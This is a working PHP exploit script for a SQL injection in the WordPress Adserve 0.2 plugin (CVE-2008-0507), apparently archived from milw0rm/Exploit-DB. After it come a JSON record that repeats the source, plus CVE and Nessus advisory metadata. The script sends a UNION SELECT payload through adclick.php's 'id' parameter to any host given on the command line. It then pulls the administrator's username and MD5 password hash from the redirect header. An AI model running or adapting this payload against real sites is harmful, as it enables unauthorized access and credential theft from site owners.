<?
# WordPress Adserve plugin v 0.2 Sql Injection Exploit
#
# Plugin Homepage-http://www.irisco.it/?page_id=40
#
# Found by:enter_the_dragon
#
# Vuln code
#
# -In adclick.php
#
# if (isset($_GET['id'])) {
# Header("Location: ".iri_AdServe_BannerClick($_GET['id'])
#
# -In iri_AdServe_BannerClick function
#
# return $wpdb->get_var("SELECT url FROM $table_name WHERE id=$id;");
#
#
#
# Exploit
#
# id variable isnt filtered so we can inject and check the output in the Location response-header
# If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved
#
#
echo "\n";
echo "-------WordPress Adserve plugin v 0.2 Sql Injection Exploit-------"."\n";
echo "-------------------coded by : enter_the_dragon--------------------"."\n";
echo "------------------------------------------------------------------"."\n";
if ($argc!=3)
{
echo " Usage: $argv[0] target_host wp_path \n";
echo " target_host: Your target ex www.target.com \n";
echo " wp_path: WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";
echo "\n";
exit;
}
$query=$argv[1];
$query.=$argv[2];
$query.="wp-content/plugins/wp-adserve/adclick.php?";
$query.="id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users";
if(function_exists(curl_init))
{
$ch = curl_init("http://$query");
curl_setopt($ch, CURLOPT_HEADER,true);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_TIMEOUT,10);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
$html=curl_exec($ch);
$returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);
if($returncode==302)
{
$pattern="/\|(.*)?\|([a-z0-9]{32})\|/";
if(preg_match($pattern,$html,$matches))
{
$adminusername=$matches[1];
$adminpass=$matches[2];
echo "Admin Login:$adminusername\n" ;
echo "Admin Pass :$adminpass\n";
}
}
else
{
exit ("Exploit Failed :( \n");
}
}
else
exit("Error:Libcurl isnt installed \n");
?>
# milw0rm.com [2008-01-30]
{"id": "EDB-ID:5013", "published": "2008-01-30T00:00:00", "sourceHref": "https://www.exploit-db.com/download/5013/", "edition": 1, "title": "WordPress Plugin Adserve 0.2 - adclick.php SQL Injection Exploit", "sourceData": "<?\n# WordPress Adserve plugin v 0.2 Sql Injection Exploit \n#\n# Plugin Homepage-http://www.irisco.it/?page_id=40\n# \t\n# Found by:enter_the_dragon\n# \n\n# Vuln code\n#\n# -In adclick.php\n#\n# if (isset($_GET['id'])) {\n# Header(\"Location: \".iri_AdServe_BannerClick($_GET['id'])\n#\t\n# -In iri_AdServe_BannerClick function\n# \n# \treturn $wpdb->get_var(\"SELECT url FROM $table_name WHERE id=$id;\"); \n#\n#\n# \n\n# Exploit\n# \n# id variable isnt filtered so we can inject and check the output in the Location response-header \n# If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved\n#\n# \n\n\n\n\necho \"\\n\";\necho \"-------WordPress Adserve plugin v 0.2 Sql Injection Exploit-------\".\"\\n\";\necho \"-------------------coded by : enter_the_dragon--------------------\".\"\\n\";\necho \"------------------------------------------------------------------\".\"\\n\";\nif ($argc!=3)\n{\necho \" Usage:\t$argv[0] target_host wp_path \\n\";\necho \" target_host:\tYour target ex www.target.com \\n\";\necho \" wp_path:\tWordPress path ex /blog/ or / if wordpress is installed in the web servers root folder\";\t \necho \"\\n\";\nexit;\n}\n\n\n$query=$argv[1];\n$query.=$argv[2];\n$query.=\"wp-content/plugins/wp-adserve/adclick.php?\";\n$query.=\"id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users\";\n\n \nif(function_exists(curl_init))\n{\n $ch = curl_init(\"http://$query\");\n curl_setopt($ch, CURLOPT_HEADER,true);\n curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);\n curl_setopt($ch, CURLOPT_TIMEOUT,10);\n curl_setopt($ch, CURLOPT_USERAGENT, \"Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)\"); \n $html=curl_exec($ch);\n $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);\n curl_close($ch);\n\n if($returncode==302)\n { \n\t$pattern=\"/\\|(.*)?\\|([a-z0-9]{32})\\|/\";\n if(preg_match($pattern,$html,$matches))\n {\n $adminusername=$matches[1];\n $adminpass=$matches[2];\n\t echo \"Admin Login:$adminusername\\n\" ;\n \t echo \"Admin Pass :$adminpass\\n\";\t \n\t }\n }\t\t \n\telse \n {\n\texit (\"Exploit Failed :( \\n\");\n }\t\n\n\n}\nelse\nexit(\"Error:Libcurl isnt installed \\n\");\n\n?>\n\n# milw0rm.com [2008-01-30]\n", "bulletinFamily": "exploit", "type": "exploitdb", "cvelist": ["CVE-2008-0507"], "history": [], "description": "Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit. CVE-2008-0507. Webapps exploit for php platform", "href": "https://www.exploit-db.com/exploits/5013/", "modified": "2008-01-30T00:00:00", "hash": "ae3fef80a9cc34ae55809162dc058c3ba8da44c62b2294d1f68a619924a07f97", "lastseen": "2016-01-31T21:17:47", "osvdbidlist": ["40779"], "viewCount": 76, "reporter": "enter_the_dragon", "objectVersion": "1.0", "references": [], "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "enchantments": {"vulnersScore": 0.0}}
{"result": {"cve": [{"id": "CVE-2008-0507", "type": "cve", "title": "CVE-2008-0507", "description": "SQL injection vulnerability in adclick.php in the AdServe 0.2 plugin for WordPress allows remote attackers to execute arbitrary SQL commands via the id parameter.", "published": "2008-01-31T15:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0507", "cvelist": ["CVE-2008-0507"], "lastseen": "2017-09-29T14:25:44"}], "nessus": [{"id": "WORDPRESS_ADSERVE_ID_SQL_INJECTION.NASL", "type": "nessus", "title": "WordPress AdServe 'adclick.php' 'id' Parameter SQL Injection", "description": "The remote host is running AdServe, a third-party ad banner plugin for WordPress.\n\nThe version of AdServe installed on the remote host fails to sanitize input to the 'id' parameter of the 'adclick.php' script before using it in a database query. Regardless of PHP's 'magic_quotes_gpc' setting, an attacker may be able to exploit this issue to manipulate database queries, leading to disclosure of sensitive information, modification of data, or attacks against the underlying database.", "published": "2008-01-30T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=30129", "cvelist": ["CVE-2008-0507"], "lastseen": "2017-10-29T13:36:04"}]}}